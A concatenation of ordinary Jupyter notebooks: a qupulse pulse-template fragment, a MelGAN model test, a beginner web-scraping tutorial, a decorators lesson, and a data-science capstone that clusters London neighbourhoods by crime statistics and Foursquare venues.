t_read', 't_read', channel='X'), FunctionPT('a*b / t_read', 't_read', channel='Y')) try: print('With wrong integral value:') abstract_readout.link_to(my_readout_wrong_integral) except Exception as err: print(repr(err)) abstract_readout.link_to(my_readout) print('the linking worked. The new experiment has now a defined duration of', repr(experiment.duration), '.')
doc/source/examples/12AbstractPulseTemplate.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 3 # language: python # name: python3 # --- # + import os os.environ['CUDA_VISIBLE_DEVICES'] = '1' # + import sys SOURCE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__name__))) sys.path.insert(0, SOURCE_DIR) # - import tensorflow as tf import malaya_speech import malaya_speech.train from malaya_speech.train.model import universal_melgan as melgan import malaya_speech.config import numpy as np melgan_config = malaya_speech.config.universal_melgan_config generator = melgan.Generator( melgan.GeneratorConfig(**melgan_config['melgan_generator_params']), name='universalmelgan-generator', ) discriminator = melgan.MultiScaleDiscriminator( melgan.WaveFormDiscriminatorConfig(**melgan_config['melgan_waveform_discriminator_params']), melgan.STFTDiscriminatorConfig(**melgan_config['melgan_stft_discriminator_params']), name='universalmelgan-discriminator', ) y = tf.placeholder(tf.float32, (None, None)) x = tf.placeholder(tf.float32, (None, None, 80)) y_hat = generator(x) p_hat = discriminator(y_hat) p = discriminator(tf.expand_dims(y, -1)) from malaya_speech.train.loss import calculate_2d_loss, calculate_3d_loss mse_loss = tf.keras.losses.MeanSquaredError() mae_loss = tf.keras.losses.MeanAbsoluteError() # + adv_loss = 0.0 for i in range(len(p_hat)): adv_loss += mse_loss(tf.ones_like(p_hat[i][-1]), p_hat[i][-1]) adv_loss /= i + 1 fm_loss = 0.0 for i in range(len(p_hat)): for j in range(len(p_hat[i]) - 1): fm_loss += mae_loss(p[i][j], p_hat[i][j]) fm_loss /= (i + 1) * (j + 1) adv_loss += 10 * fm_loss # + real_loss = 0.0 fake_loss = 0.0 for i in range(len(p)): real_loss += mse_loss(tf.ones_like(p[i][-1]), p[i][-1]) fake_loss += mse_loss(tf.zeros_like(p_hat[i][-1]), p_hat[i][-1]) real_loss /= i + 1 fake_loss /= i + 1 dis_loss = real_loss + fake_loss # - adv_loss, dis_loss sess = tf.InteractiveSession() sess.run(tf.global_variables_initializer()) # + # adv_loss_, dis_loss_ = sess.run([adv_loss, dis_loss], # feed_dict = {x: np.random.uniform(size=(1,200,80)), # y: np.random.uniform(size=(1,51200))}) # + # y_hat_, loss, p_, p_hat_ = sess.run([y_hat, p_hat, p], # feed_dict = {x: np.random.uniform(size=(1,200,80)), # y: np.random.uniform(size=(1,51200))}) # - sess.run(y_hat, feed_dict = {x: np.random.uniform(size=(1,200,80))}).shape saver = tf.train.Saver() saver.save(sess, 'test/model.ckpt') # !rm -rf test
test/test-universal-melgan.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 3 # language: python # name: python3 # --- # ## Scraping basics # # There are a few steps you'll follow pretty much every time you write a new web scraper: # # 1. Inspect the underlying HTML on the page you want to scrape. Use "View Source" in your browser, or right-click and "Inspect Element" to take a look at how the HTML tags are structured around the data you want to capture. # 2. In the programming language of your choice (we're using Python here), write a script that: # * Opens that page from the internet # * Parses its HTML, using the tags you spotted earlier as a guide # * Saves that data for later # 3. Test your scraper, fix what's broken, and run it again till it works. # # Feels like a pretty straightforward process, but the code underneath the pages where your data lives are often _anything_ but straightforward. So let's start by stepping through the process with a super simple example. # # [This page just has one table on it](pages/scraper-0-page-example-table.html), holding some recent data about NICAR conference locations. Try "View Source" and take a look at the code underneath. A `<table>` tag, some `<tr>` table rows inside of it, and some `<td>` table cells inside those rows. Just what we like to see. # # So let's get that data out of there! In the script we'll build below, our `#` code comments will guide us through each piece of code to write. The first thing we need to do in our Python script is import the libraries we'll be using here: `BeautifulSoup` for parsing HTML and `csv` to write our data to a file. # import the Python libraries we need from bs4 import BeautifulSoup import csv # Now we need to load our page and parse it. Our local copy of the HTML makes that easy, and we'll use `BeautifulSoup` to turn it into a Python object we can work with. # + # use Python's open() to open the HTML page we've stored locally page = open('pages/scraper-0-page-example-table.html', 'r') # use BeautifulSoup to parse that page into Python soup = BeautifulSoup(page, 'html.parser') # and close the HTML page page.close() # - # We know we want to make ourselves a CSV later on, so we'll need an empty Python list to start stuffing each row of data into. And we can use `BeautifulSoup` again to find just the part of our page we care about: the `<table>`. # + # make ourselves an empty list to hold data for a CSV list_of_rows = [] # use BeautifulSoup to find the table in our parsed HTML table = soup.find('table') # - # And now we're ready to start extracting data! We need a Python loop that: # # * goes through each `<tr>` in our `<table>` # * creates a new, temporary list to hold the cell data it contains # * loops through each `<td>` in that row, adding its text to our temporary list # * and once we've processed the full row, append it all to our master list of row data. # # Then our loop will move on to the next row, and repeat. # loop through the rows in our table using BeautifulSoup for row in table.find_all('tr'): # create an empty list each time through, to hold cell data list_of_cells = [] # loop through each cell in this table row for cell in row.find_all('td'): # grab the text from that cell text = cell.text.strip() # and append it to our list list_of_cells.append(text) # when we're done with this table row, append its data to our list of rows list_of_rows.append(list_of_cells) # With our data successfully extracted and stored in a nice, big list of lists, we can use Pyton's built-in `csv` library to write ourselves a CSV to analyze later. # use Python's CSV library to create our output file outfile = open('nicar_cities.csv', 'w') writer = csv.writer(outfile) writer.writerows(list_of_rows) outfile.close() # And there we have it, we scraped! # # Our [next exercise](scraper-1.ipynb) adds just a bit of complexity. We'll scrape a page with more than just a `<table>` on it, and we'll pull it straight off the internet (wifi willing).
completed_code/scraper-0.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 3 (ipykernel) # language: python # name: python3 # --- # # Viper Data Process Diagram # # The following Process Diagram shows how the different Viper nodes communicate with one another. The green lines indicate processes where an image is being shared between two nodes, whereas an orange line shows where data is being communicated in the form of messages ranging from simple Bool to arrays of matrices. # # **Fig. 1 Viper Process Diagram** # # # ![](viper_data_process.png) # #
docs/process_diagram.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 3 # language: python # name: python3 # --- s = 'Global Variable' def check_for_locals(): print(locals()) print(globals().keys()) print(globals()['s']) check_for_locals() def hello(name='Jose'): return 'Hello ' + name hello() greet = hello greet hello greet() def hello(name='Jose'): print('The hello() function has been executed') def greet(): return '\t this is inside the greet() function' def welcome(): return '\t this is inside the welcome() function' print(greet()) print(welcome()) print("Now we are back inside the hello() function") hello() welcome() def hello(name='Jose'): print('The hello() function has been executed') def greet(): return '\t this is inside the greet() function' def welcome(): return '\t this is inside the welcome() function' if name == 'Jose': return greet else: return welcome x = hello() x x = hello(name='bskim') x print(x()) x = hello()() x print(x) x = hello x print(x()) x=hello(name = 'Jose') x # + def hello(): return 'Hi Jose!' def other(func): print('Other code would go heare') print(func()) # - other(hello) # + def new_decorator(func): def wrap_func(): print('Code would be heare, before executing the func') func() print('code heare will be execute after the func()') return wrap_func def func_needs_decorator(): print('This function is in need of a Decorator') # - func_needs_decorator() func_needs_decorator = new_decorator(func_needs_decorator) func_needs_decorator() @new_decorator def func_needs_decorator(): print('This function is in need of a Decorator') func_needs_decorator()
python/function_decorator.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 3 # language: python # name: python3 # --- # + [markdown] id="view-in-github" colab_type="text" # <a href="https://colab.research.google.com/github/venqics/Coursera_capstone/blob/master/Capstone_Project_The_Battle_of_the_Neighborhoods_London_Neighborhood_Clustering.ipynb" target="_parent"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"/></a> # + [markdown] id="Z2Hq8VXfFD0z" colab_type="text" # ## Capstone Project - The Battle of the Neighborhoods # ### Applied Data Science Capstone by IBM/Coursera # + [markdown] id="TIkN8iUsFD06" colab_type="text" # ## Table of contents # * [Introduction: Business Problem](#introduction) # * [Data](#data) # * [Methodology](#methodology) # * [Analysis](#analysis) # * [Results and Discussion](#results) # * [Conclusion](#conclusion) # + [markdown] id="Bm8dyqm8FD08" colab_type="text" # ## Introduction: Business Problem <a name="introduction"></a> # + [markdown] id="dIJQm2HXFD09" colab_type="text" # # This project aims to select the safest borough in London based on the **total crimes**, explore the **neighborhoods** of that borough to find the **10 most common venues** in each neighborhood and finally cluster the neighborhoods using **k-mean clustering**. # # This report will be targeted to people who are looking to **relocate to London**. Inorder to finalise a neighborhood to hunt for an apartment, **safety** is considered as a top concern when moving to a new place. If you don’t feel safe in your own home, you’re not going to be able to enjoy living there. The **crime statistics** will provide an insight into this issue. # # We will focus on the safest borough and explore its neighborhoods and the 10 most common venues in each neighborhood so that the best neighborhood suited to an individual's needs can be selected. # + [markdown] id="dDLHoD51FD0-" colab_type="text" # ## Data <a name="data"></a> # # Based on definition of our problem, factors that will influence our decision are: # * The total number of crimes commited in each of the borough during the last year. # * The most common venues in each of the neighborhood in the safest borough selected. # # Following data sources will be needed to extract/generate the required information: # # - [**Part 1**: Preprocessing a real world data set from Kaggle showing the London Crimes from 2008 to 2016](#part1): A dataset consisting of the crime statistics of each borough in London obtained from Kaggle # - [**Part 2**: Scraping additional information of the different Boroughs in London from a Wikipedia page.](#part2): More information regarding the boroughs of London is scraped using the Beautifulsoup library # - [**Part 3**: Creating a new dataset of the Neighborhoods of the safest borough in London and generating their co-ordinates.](#part3): Co-ordinate of neighborhood will be obtained using **Google Maps API geocoding** # # + [markdown] id="TDJ_ijV-FD1A" colab_type="text" # ### Part 1: Preprocessing a real world data set from Kaggle showing the London Crimes from 2008 to 2016<a name="part1"></a> # # # #### London Crime Data # # About this file # # - lsoa_code: code for Lower Super Output Area in Greater London. # - borough: Common name for London borough. # - major_category: High level categorization of crime # - minor_category: Low level categorization of crime within major category. # - value: monthly reported count of categorical crime in given borough # - year: Year of reported counts, 2008-2016 # - month: Month of reported counts, 1-12 # # Data set URL: https://www.kaggle.com/jboysen/london-crime # # + [markdown] id="uXtrWkTWFD1B" colab_type="text" # #### Import necessary libraries # + id="zCcWPnIcFD1D" colab_type="code" colab={} outputId="4c101e88-519a-4ea3-9da8-aa039cdf2755" import requests # library to handle requests import pandas as pd # library for data analsysis import numpy as np # library to handle data in a vectorized manner import random # library for random number generation from bs4 import BeautifulSoup # library for web scrapping # #!conda install -c conda-forge geocoder --yes import geocoder # #!conda install -c conda-forge geopy --yes from geopy.geocoders import Nominatim # module to convert an address into latitude and longitude values # libraries for displaying images from IPython.display import Image from IPython.core.display import HTML # tranforming json file into a pandas dataframe library from pandas.io.json import json_normalize # #!conda install -c conda-forge folium=0.5.0 --yes import folium # plotting library print('Folium installed') print('Libraries imported.') # + id="lAtTxTqbGTSQ" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 120} outputId="b466bdbc-440f-4381-d5d0-943f4596d7f2" from google.colab import drive drive.mount('/content/drive') # + [markdown] id="9QYwQ8YXFD1L" colab_type="text" # #### Define Foursquare Credentials and Version # Make sure that you have created a Foursquare developer account and have your credentials handy # + id="7aoIhZliFD1R" colab_type="code" colab={} CLIENT_ID = 'NOML2AGEMHEJH2ARDFOPXFK1J5DI00055VWDGW0DZIDHUZEV' # your Foursquare ID CLIENT_SECRET = '<KEY>' # your Foursquare Secret VERSION = '20180604' LIMIT = 30 # + [markdown] id="nISj48utFD1X" colab_type="text" # #### Read in the dataset # + id="-bfFnDdvFD1Y" colab_type="code" colab={} # Read in the data df = pd.read_csv("london_crime_by_lsoa.csv") # + id="k4W5BXlXFD1c" colab_type="code" colab={} outputId="5e63430d-02c5-49bf-ebcb-5fc1f77dc7f6" # View the top rows of the dataset df.head() # + [markdown] id="i6UuRmVgFD1i" colab_type="text" # #### Accessing the most recent crime rates (2016) # + id="04h4uqiKFD1j" colab_type="code" colab={} # Taking only the most recent year (2016) and dropping the rest df.drop(df.index[df['year'] != 2016], inplace = True) # Removing all the entires where crime values are null df = df[df.value != 0] # Reset the index and dropping the previous index df = df.reset_index(drop=True) # + id="Kp45fvWuFD1p" colab_type="code" colab={} outputId="21fc028f-b3c2-4540-d380-2afe755a0f8f" # Shape of the data frame df.shape # + id="v6BjuBD2FD1t" colab_type="code" colab={} outputId="2a67e2a9-dc37-4d2a-c586-ebde062b7f49" # View the top of the dataset df.head() # + [markdown] id="MG63_E6qFD1y" colab_type="text" # #### Change the column names # + id="M6SuO190FD10" colab_type="code" colab={} outputId="26b81878-64af-4b77-eb71-020d75be54d4" df.columns = ['LSOA_Code', 'Borough','Major_Category','Minor_Category','No_of_Crimes','Year','Month'] df.head() # + id="juZUxsvzFD1_" colab_type="code" colab={} outputId="9ee69653-74ab-4021-a45d-9cb85e22e091" # View the information of the dataset df.info() # + [markdown] id="H3HOmk_pFD2D" colab_type="text" # #### Total number of crimes in each Borough # + id="aLbn9CWVFD2F" colab_type="code" colab={} outputId="989896e3-a16f-48e3-b020-df742dc24d52" df['Borough'].value_counts() # + [markdown] id="iQdvjVapFD2K" colab_type="text" # #### The total crimes per major category # + id="kVp4dyMWFD2L" colab_type="code" colab={} outputId="d51d48b7-3b5d-41fd-db72-b0240b698d0a" df['Major_Category'].value_counts() # + [markdown] id="0s7n8aNWFD2P" colab_type="text" # #### Pivoting the table to view the no. of crimes for each major category in each Borough # + id="0CqqVF2ZFD2R" colab_type="code" colab={} outputId="22ad197c-8fcf-484e-c372-0f289418437a" London_crime = pd.pivot_table(df,values=['No_of_Crimes'], index=['Borough'], columns=['Major_Category'], aggfunc=np.sum,fill_value=0) London_crime.head() # + id="MlRbiR9MFD2X" colab_type="code" colab={} # Reset the index London_crime.reset_index(inplace = True) # + id="WXQChI5eFD2g" colab_type="code" colab={} outputId="31d26231-be68-4e05-a700-c5c9ca581cea" # Total crimes per Borough London_crime['Total'] = London_crime.sum(axis=1) London_crime.head(33) # + [markdown] id="g0HdlhfbFD2k" colab_type="text" # #### Removing the multi index so that it will be easier to merge # + id="AX8aHkuhFD2m" colab_type="code" colab={} outputId="641e3bb0-5a79-4f83-851e-cfc199a386ab" London_crime.columns = London_crime.columns.map(''.join) London_crime.head() # + [markdown] id="mrY02uU3FD2q" colab_type="text" # #### Renaming the columns # + id="AtAvgai-FD2s" colab_type="code" colab={} outputId="a56241a4-8b55-4178-f809-3e78c599ada9" London_crime.columns = ['Borough','Burglary', 'Criminal Damage','Drugs','Other Notifiable Offences', 'Robbery','Theft and Handling','Violence Against the Person','Total'] London_crime.head() # + id="oHzo0d10FD2y" colab_type="code" colab={} outputId="6c26bdfe-f761-4c69-af0e-31dc75c6fe23" # Shape of the data set London_crime.shape # + id="dqdtJf2DFD22" colab_type="code" colab={} # View the Columns in the data frame # London_crime.columns.tolist() # + [markdown] id="aeEC38FyFD26" colab_type="text" # ### Part 2: Scraping additional information of the different Boroughs in London from a Wikipedia page <a name="part2"></a> # # **Using Beautiful soup to scrap the latitude and longitiude of the boroughs in London** # # URL: https://en.wikipedia.org/wiki/List_of_London_boroughs # + id="uO459kW6FD28" colab_type="code" colab={} outputId="aaf0b9b7-25c6-4275-bd11-ce1379b32615" # getting data from internet wikipedia_link='https://en.wikipedia.org/wiki/List_of_London_boroughs' raw_wikipedia_page= requests.get(wikipedia_link).text # using beautiful soup to parse the HTML/XML codes. soup = BeautifulSoup(raw_wikipedia_page,'xml') print(soup.prettify()) # + id="oqjEgiZfFD3A" colab_type="code" colab={} outputId="d1f53467-eb4f-449b-862f-0583343c30b7" # extracting the raw table inside that webpage table = soup.find_all('table', {'class':'wikitable sortable'}) print(table) # + [markdown] id="EmxF9c1NFD3E" colab_type="text" # #### Converting the table into a data frame # + id="Vr11e4rQFD3G" colab_type="code" colab={} outputId="6505e1cb-4784-4252-e93f-f0a5d2d65874" London_table = pd.read_html(str(table[0]), index_col=None, header=0)[0] London_table.head() # + [markdown] id="i4Ef4PE2FD3J" colab_type="text" # #### The second table on the site contains the addition Borough i.e. City of London # + id="UQP59FNDFD3L" colab_type="code" colab={} outputId="65defc73-9d85-4bfc-c486-01303171a939" # Read in the second table London_table1 = pd.read_html(str(table[1]), index_col=None, header=0)[0] # Rename the columns to match the previous table to append the tables. London_table1.columns = ['Borough','Inner','Status','Local authority','Political control', 'Headquarters','Area (sq mi)','Population (2013 est)[1]','Co-ordinates','Nr. in map'] # View the table London_table1 # + [markdown] id="T4AJguSEFD3O" colab_type="text" # #### Append the data frame together # + id="dcieT3mhFD3P" colab_type="code" colab={} outputId="21fff418-3d9f-4af0-9416-517cda4b6dbb" # A continuous index value will be maintained # across the rows in the new appended data frame. London_table = London_table.append(London_table1, ignore_index = True) London_table.head() # + [markdown] id="264iYMlhFD3Y" colab_type="text" # #### Check if the last row was appended correctly # + id="QzEnhsOuFD3Z" colab_type="code" colab={} outputId="089ce9f3-0665-434c-83cc-3ce2316fb2ae" London_table.tail() # + [markdown] id="1PxJ92_TFD3f" colab_type="text" # #### View the information of the data set # + id="ij58sdmaFD3g" colab_type="code" colab={} outputId="8092ba90-09f7-493c-8ef1-915cbcbf7dff" London_table.info() # + [markdown] id="EKRQECS8FD3m" colab_type="text" # #### Removing Unnecessary string in the Data set # + id="xVnANGlOFD3o" colab_type="code" colab={} outputId="eedd15ef-5590-43b4-d23f-54ae71727781" London_table = London_table.replace('note 1','', regex=True) London_table = London_table.replace('note 2','', regex=True) London_table = London_table.replace('note 3','', regex=True) London_table = London_table.replace('note 4','', regex=True) London_table = London_table.replace('note 5','', regex=True) # View the top of the data set London_table.head() # + [markdown] id="tX1n2ZlfFD3w" colab_type="text" # #### Check the type of the newly created table # + id="E-K0YHADFD31" colab_type="code" colab={} outputId="3a56f4cc-5838-4649-b863-2f853b404b1e" type(London_table) # + id="gAVQ15CNFD36" colab_type="code" colab={} outputId="96cf6c5e-8ec0-4c8d-db0f-3a5147b5f507" # Shape of the data frame London_table.shape # + [markdown] id="fXcNBEyXFD4B" colab_type="text" # #### Check if the Borough in both the data frames match. # + id="Q9ElRBWAFD4C" colab_type="code" colab={} outputId="2d5f1756-96c7-4e0d-c1dd-df9239db149c" set(df.Borough) - set(London_table.Borough) # + [markdown] id="FrruaC0tFD4G" colab_type="text" # These 3 Boroughs don't match because of the unnecessary symobols present "[]" # + [markdown] id="5h3jlrTlFD4H" colab_type="text" # #### Find the index of the Boroughs that didn't match # + id="-FWYlV_hFD4I" colab_type="code" colab={} outputId="07296ebc-05fa-44cf-d9b2-9137b75f5cde" print("The index of first borough is",London_table.index[London_table['Borough'] == 'Barking and Dagenham []'].tolist()) print("The index of second borough is",London_table.index[London_table['Borough'] == 'Greenwich []'].tolist()) print("The index of third borough is",London_table.index[London_table['Borough'] == 'Hammersmith and Fulham []'].tolist()) # + [markdown] id="p5YN4yxCFD4K" colab_type="text" # #### Changing the Borough names to match the other data frame # + id="9uCiKb2hFD4P" colab_type="code" colab={} London_table.iloc[0,0] = 'Barking and Dagenham' London_table.iloc[9,0] = 'Greenwich' London_table.iloc[11,0] = 'Hammersmith and Fulham' # + [markdown] id="ZavavmyxFD4S" colab_type="text" # #### Check if the Borough names in both data sets match # + id="tPXFPy87FD4U" colab_type="code" colab={} outputId="2ddd38d2-1731-4435-f559-ff6103cfe7e2" set(df.Borough) - set(London_table.Borough) # + [markdown] id="3cnzLgJRFD4h" colab_type="text" # The Borough names in both data frames match # + [markdown] id="usMhvLCeFD4j" colab_type="text" # #### We can combine both the data frames together # + id="9oy4O6SRFD4k" colab_type="code" colab={} outputId="523816c4-633e-4704-cb0c-d49f327fec6a" Ld_crime = pd.merge(London_crime, London_table, on='Borough') Ld_crime.head(10) # + id="JeZ0Q6FNFD4q" colab_type="code" colab={} outputId="6cf57fe4-5f38-4062-dfb1-9ce60e80948f" Ld_crime.shape # + id="wvT-XuUmFD4y" colab_type="code" colab={} outputId="a9eb8b25-6f87-470d-ac0a-38ce6847a9f1" set(df.Borough) - set(Ld_crime.Borough) # + [markdown] id="tgo1EhWBFD45" colab_type="text" # #### Rearranging the Columns # + id="Z2lzDLd8FD47" colab_type="code" colab={} outputId="fdc99ec0-0ac9-4c0b-c32a-e92bd6efc326" # List of Column names of the data frame list(Ld_crime) # + id="KA7MnUi-FD5E" colab_type="code" colab={} outputId="17145a26-b674-4a7d-b34f-6ef7b557c3d3" columnsTitles = ['Borough','Local authority','Political control','Headquarters', 'Area (sq mi)','Population (2013 est)[1]', 'Inner','Status', 'Burglary','Criminal Damage','Drugs','Other Notifiable Offences', 'Robbery','Theft and Handling','Violence Against the Person','Total','Co-ordinates'] Ld_crime = Ld_crime.reindex(columns=columnsTitles) Ld_crime = Ld_crime[['Borough','Local authority','Political control','Headquarters', 'Area (sq mi)','Population (2013 est)[1]','Co-ordinates', 'Burglary','Criminal Damage','Drugs','Other Notifiable Offences', 'Robbery','Theft and Handling','Violence Against the Person','Total']] Ld_crime.head() # + [markdown] id="EQUw38VVFD5J" colab_type="text" # ## Methodology <a name="methodology"></a> # + [markdown] id="EArXLiDyFD5L" colab_type="text" # The methodology in this project consists of two parts: # - [Exploratory Data Analysis](#EDA): Visualise the crime rates in the London boroughs to idenity the safest borough and extract the neighborhoods in that borough to find the 10 most common venues in each neighborhood. # # # - [Modelling](#modelling): To help people find similar neighborhoods in the safest borough we will be clustering similar neighborhoods using K - means clustering which is a form of unsupervised machine learning algorithm that clusters data based on predefined cluster size. We will use a cluster size of 5 for this project that will cluster the 15 neighborhoods into 5 clusters. The reason to conduct a K- means clustering is to cluster neighborhoods with similar venues together so that people can shortlist the area of their interests based on the venues/amenities around each neighborhood. # # + [markdown] id="_koXAu8MFD5M" colab_type="text" # ### Exploratory Data Analysis <a name="EDA"></a> # + [markdown] id="JFT0eJtYFD5R" colab_type="text" # #### Descriptive statistics of the data # + id="V7yb-WYXFD5X" colab_type="code" colab={} outputId="2a58c782-654b-4d30-e3be-73049c2d03a5" London_crime.describe() # + id="cnJCzWfBFD5Z" colab_type="code" colab={} outputId="8f7fb165-3435-464d-c0be-b5de002761a5" # use the inline backend to generate the plots within the browser # %matplotlib inline import matplotlib as mpl import matplotlib.pyplot as plt mpl.style.use('ggplot') # optional: for ggplot-like style # check for latest version of Matplotlib print ('Matplotlib version: ', mpl.__version__) # >= 2.0.0 # Matplotlib and associated plotting modules import matplotlib.cm as cm import matplotlib.colors as colors # + [markdown] id="oGMMuPEfFD5e" colab_type="text" # #### Check if the column names are strings # + id="tw6DpDoEFD5f" colab_type="code" colab={} outputId="167d22c6-bbe7-4e60-e116-112068fd27fc" Ld_crime.columns = list(map(str, Ld_crime.columns)) # let's check the column labels types now all(isinstance(column, str) for column in Ld_crime.columns) # + [markdown] id="E-UDfqF0FD5l" colab_type="text" # #### Sort the total crimes in descenting order to see 5 boroughs with the highest number of crimes # + id="e0Yo5ASRFD5n" colab_type="code" colab={} outputId="094549a3-3ca9-4784-f08d-5713f42a12ae" Ld_crime.sort_values(['Total'], ascending = False, axis = 0, inplace = True ) df_top5 = Ld_crime.head() df_top5 # + [markdown] id="29umQmxqFD5v" colab_type="text" # #### Visualize the five boroughs with the highest number of crimes # + id="8u3fQPCnFD5w" colab_type="code" colab={} outputId="a046744b-032d-407f-d6cc-cc05a18102b0" df_tt = df_top5[['Borough','Total']] df_tt.set_index('Borough',inplace = True) ax = df_tt.plot(kind='bar', figsize=(10, 6), rot=0) ax.set_ylabel('Number of Crimes') # add to x-label to the plot ax.set_xlabel('Borough') # add y-label to the plot ax.set_title('London Boroughs with the Highest no. of crime') # add title to the plot # Creating a function to display the percentage. for p in ax.patches: ax.annotate(np.round(p.get_height(),decimals=2), (p.get_x()+p.get_width()/2., p.get_height()), ha='center', va='center', xytext=(0, 10), textcoords='offset points', fontsize = 14 ) plt.show() # + [markdown] id="Ph3N8cLHFD51" colab_type="text" # ### We'll stay clear from these places :) # + [markdown] id="Jtw2HkwOFD54" colab_type="text" # #### Sort the total crimes in ascending order to see 5 boroughs with the highest number of crimes # + id="aomaXagWFD56" colab_type="code" colab={} outputId="e0a0225b-0755-4c50-9eb9-f3da99562f97" Ld_crime.sort_values(['Total'], ascending = True, axis = 0, inplace = True ) df_bot5 = Ld_crime.head() df_bot5 # + [markdown] id="FtBNBbHUFD5-" colab_type="text" # #### Visualize the five boroughs with the least number of crimes # + id="4HWVWjSgFD5_" colab_type="code" colab={} outputId="2f740276-b8e2-469e-b33e-09714bfe9c43" df_bt = df_bot5[['Borough','Total']] df_bt.set_index('Borough',inplace = True) ax = df_bt.plot(kind='bar', figsize=(10, 6), rot=0) ax.set_ylabel('Number of Crimes') # add to x-label to the plot ax.set_xlabel('Borough') # add y-label to the plot ax.set_title('London Boroughs with the least no. of crime') # add title to the plot # Creating a function to display the percentage. for p in ax.patches: ax.annotate(np.round(p.get_height(),decimals=2), (p.get_x()+p.get_width()/2., p.get_height()), ha='center', va='center', xytext=(0, 10), textcoords='offset points', fontsize = 14 ) plt.show() # + [markdown] id="dP_5qLl_FD6B" colab_type="text" # The borough City of London has the lowest no. of crimes recorded for the year 2016, Looking into the details of the borough: # + id="FfDRjVHJFD6D" colab_type="code" colab={} outputId="07b5abd3-1c43-479c-adb1-9ce50b3a3f0d" df_col = df_bot5[df_bot5['Borough'] == 'City of London'] df_col = df_col[['Borough','Total','Area (sq mi)','Population (2013 est)[1]']] df_col # + [markdown] id="sQjJvg5ZFD6J" colab_type="text" # #### As per the wikipedia page, The City of London is the 33rd principal division of Greater London but it is not a London borough. # URL: https://en.wikipedia.org/wiki/List_of_London_boroughs # # #### Hence we will focus on the next borough with the least crime i.e. Kingston upon Thames # # ### Visualizing different types of crimes in the borough 'Kingston upon Thames' # + id="UN4tkaH9FD6J" colab_type="code" colab={} outputId="b44858ce-ec1e-4099-c8a5-b5db3bced521" df_bc1 = df_bot5[df_bot5['Borough'] == 'Kingston upon Thames'] df_bc = df_bc1[['Borough','Burglary','Criminal Damage','Drugs','Other Notifiable Offences', 'Robbery','Theft and Handling','Violence Against the Person']] df_bc.set_index('Borough',inplace = True) ax = df_bc.plot(kind='bar', figsize=(10, 6), rot=0) ax.set_ylabel('Number of Crimes') # add to x-label to the plot ax.set_xlabel('Borough') # add y-label to the plot ax.set_title('London Boroughs with the least no. of crime') # add title to the plot # Creating a function to display the percentage. for p in ax.patches: ax.annotate(np.round(p.get_height(),decimals=2), (p.get_x()+p.get_width()/2., p.get_height()), ha='center', va='center', xytext=(0, 10), textcoords='offset points', fontsize = 14 ) plt.show() # + [markdown] id="D2_dxcqBFD6M" colab_type="text" # We can conclude that Kingston upon Thames is the safest borough when compared to the other boroughs in London. # + [markdown] id="0jnKPQShFD6N" colab_type="text" # ### Part 3: Creating a new dataset of the Neighborhoods of the safest borough in London and generating their co-ordinates. <a name="part3"></a> # # # # The list of Neighborhoods in the Royal Borough of Kingston upon Thames was found on a wikipedia page: https://en.wikipedia.org/wiki/List_of_districts_in_the_Royal_Borough_of_Kingston_upon_Thames # + id="T4Wot1hQFD6O" colab_type="code" colab={} outputId="255d5d50-c88c-4cd3-8c20-29b70ef1f192" Neighborhood = ['Berrylands','Canbury','Chessington','Coombe','Hook','Kingston upon Thames', 'Kingston Vale','Malden Rushett','Motspur Park','New Malden','Norbiton', 'Old Malden','Seething Wells','Surbiton','Tolworth'] Borough = ['Kingston upon Thames','Kingston upon Thames','Kingston upon Thames','Kingston upon Thames', 'Kingston upon Thames','Kingston upon Thames','Kingston upon Thames','Kingston upon Thames', 'Kingston upon Thames','Kingston upon Thames','Kingston upon Thames','Kingston upon Thames', 'Kingston upon Thames','Kingston upon Thames','Kingston upon Thames'] Latitude = ['','','','','','','','','','','','','','',''] Longitude = ['','','','','','','','','','','','','','',''] df_neigh = {'Neighborhood': Neighborhood,'Borough':Borough,'Latitude': Latitude,'Longitude':Longitude} kut_neig = pd.DataFrame(data=df_neigh, columns=['Neighborhood', 'Borough', 'Latitude', 'Longitude'], index=None) kut_neig # + [markdown] id="jsEPF75pFD6X" colab_type="text" # #### Find the Co-ordiantes of each Neighborhood in the Kingston upon Thames Neighborhood # + id="SRNaZvn7FD6Y" colab_type="code" colab={} outputId="c85e6fce-7d69-49e2-9082-6fb2c6099dd2" Latitude = [] Longitude = [] for i in range(len(Neighborhood)): address = '{},London,United Kingdom'.format(Neighborhood[i]) geolocator = Nominatim(user_agent="London_agent") location = geolocator.geocode(address) Latitude.append(location.latitude) Longitude.append(location.longitude) print(Latitude, Longitude) # + id="D-29HYVIFD6b" colab_type="code" colab={} outputId="a6bf6d27-b4d7-4819-a0af-10695b3d019f" df_neigh = {'Neighborhood': Neighborhood,'Borough':Borough,'Latitude': Latitude,'Longitude':Longitude} kut_neig = pd.DataFrame(data=df_neigh, columns=['Neighborhood', 'Borough', 'Latitude', 'Longitude'], index=None) kut_neig # + [markdown] id="ihBxNahaFD6d" colab_type="text" # #### Get the co-ordinates of Berrylands, London, United Kingdom (The center neighborhood of Kingston upon Thames) # + id="UEfpPOrBFD6e" colab_type="code" colab={} outputId="fc2cbf48-0b58-4a0b-9747-1a58307cd0fc" address = 'Berrylands, London, United Kingdom' geolocator = Nominatim(user_agent="ld_explorer") location = geolocator.geocode(address) latitude = location.latitude longitude = location.longitude print('The geograpical coordinate of Berrylands, London are {}, {}.'.format(latitude, longitude)) # + [markdown] id="AEpkhH5IFD6m" colab_type="text" # #### Visualize the Neighborhood of Kingston upon Thames Borough # + id="p32SfvyAFD6n" colab_type="code" colab={} outputId="cc0d69b0-acaf-4aa0-eb58-ed0e5a82e18b" # create map of New York using latitude and longitude values map_lon = folium.Map(location=[latitude, longitude], zoom_start=12) # add markers to map for lat, lng, borough, neighborhood in 